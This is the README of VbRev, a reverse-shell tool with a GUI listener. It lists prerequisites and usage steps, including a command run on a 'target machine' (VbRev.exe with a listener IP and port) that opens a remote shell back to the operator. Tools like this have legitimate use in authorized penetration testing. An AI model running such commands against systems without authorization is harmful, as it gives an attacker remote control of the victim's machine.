################################
#                              #
#   VbRev Reverse Shell GUI    #
#   http://vbscrub.com         #
#                              #
################################


Prerequisites: 

	.NET Framework 4.0 (Full or Client Profile)

Basic usage:

	Step 1. On your own machine launch the GUI (VbRevUi.exe)

	Step 2. Within the GUI, specify a port number to listen on (e.g 4444) and start the listener

	Step 3. On the target machine, run the following:

   		VbRev.exe 192.168.0.1 4444

   		(where 192.168.0.1 is the IP address of the machine running the VbRevUi.exe GUI, and 4444 is the port number you selected in step 2).

	If you do not receive a connection in the GUI, ensure there is no firewall on your side of things blocking the chosen port.


Please report any bugs here: https://github.com/VbScrub/VbRev/issues